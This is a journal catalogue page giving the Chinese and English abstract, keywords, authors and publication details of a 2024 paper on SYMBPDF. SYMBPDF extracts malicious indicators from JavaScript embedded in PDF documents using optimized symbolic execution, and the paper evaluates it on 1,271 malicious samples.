首页|基于符号执行优化的PDF恶意指标提取技术

基于符号执行优化的PDF恶意指标提取技术

扫码查看
恶意PDF文档是APT组织常用的攻击方法,提取分析其内嵌JavaScript代码指标是判定文档恶意性的重要手段,然而攻击者可以采取高度混淆、虚拟机与沙箱检测等逃逸方法.因此,文中创新性地将符号执行方法用于PDF指标提取,提出了一种基于符号执行优化的PDF恶意指标提取技术,并实现了由代码解析、符号执行和指标提取3个模块组成的指标提取系统SYMBPDF.在代码解析模块中实现内嵌JavaScript代码提取与重组.在符号执行模块中设计代码改写方法,通过强制分支转移提高符号执行的代码覆盖率;设计并发策略和两种约束求解优化方法,以提高系统执行效率.在指标提取模块中实现恶意指标整合与记录.对1271个恶意样本进行了指标提取与评估,指标提取成功率为92.2%,有效性为91.7%,代码覆盖率较优化前提升8.5%,系统性能较优化前提升32.3%.
PDF Malicious Indicators Extraction Technique Based on Improved Symbolic Execution
The malicious PDF document is a common attack method used by APT organizations.Analyzing extracted indicators of embedded JavaScript code is an important means to determine the maliciousness of the documents.However,attackers can adopt high obfuscation,sandbox detection and other escape methods to interfere with analysis.Therefore,this paper innovatively applies symbolic execution method to PDF indicator extraction.We propose a PDF malicious indicator extraction technique based on im-proved symbolic execution and implement SYMBPDF,an indicator extraction system consisting of three modules:code parsing,symbolic execution and indicator extraction.In the code parsing module,we implement extraction and reorganization of inline Javascript code.In the symbolic execution module,we design the code rewriting method to force branch shifting,resulting in im-proving the code coverage of symbolic execution.We also design a concurrency strategy and two constraint solving optimization methods to improve the efficiency.In the indicator extraction module,we realize integration and recording of malicious indicators.In this paper,1 271 malicious samples are extracted and evaluated.The success rate of indicator extraction is 92.2%,the indicator effectiveness is 91.7%,the code coverage is 8.5%higher and the system performance is 32.3%higher than that of before opti-mization.

Malicious documentsJavaScript codeIndicator extractionSymbolic executionCode rewritingConstraint solving op-timization

宋恩舟、胡涛、伊鹏、王文博

展开 >

国家数字交换系统工程技术研究中心 郑州 450001

恶意文档 JavaScript代码 指标提取 符号执行 代码改写 约束求解优化

国家自然科学基金面上项目

62176264

2024

计算机科学
重庆西南信息有限公司(原科技部西南信息中心)

计算机科学

CSTPCD北大核心
影响因子:0.944
ISSN:1002-137X
年,卷(期):2024.51(7)
  • 3